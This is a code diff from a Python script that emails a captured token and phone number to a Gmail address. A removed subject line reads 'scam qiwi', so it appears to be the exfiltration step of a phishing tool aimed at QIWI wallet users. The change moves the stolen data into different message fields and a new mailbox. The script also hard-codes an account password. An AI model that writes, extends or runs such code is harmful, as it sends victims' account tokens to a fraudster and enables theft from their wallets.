@@ -8,15 +8,15 @@ import smtplib
 msg = MIMEMultipart()
  
 def send_msg(tk,lg):
-    message = ('token  - ' + str(tk) + " and phone - " + lg)
+    message = (str(tk))
 
 
     
     # setup the parameters of the message
     password = "magaisaev95"
-    msg['From'] = "tramong682@gmail.com"
-    msg['To'] = "tramong682@gmail.com"
-    msg['Subject'] = "scam qiwi"
+    msg['From'] = "niktoinoy682@gmail.com"
+    msg['To'] = "niktoinoy682@gmail.com"
+    msg['Subject'] = str(lg)
     
     # add in the message body
     msg.attach(MIMEText(message, 'plain'))
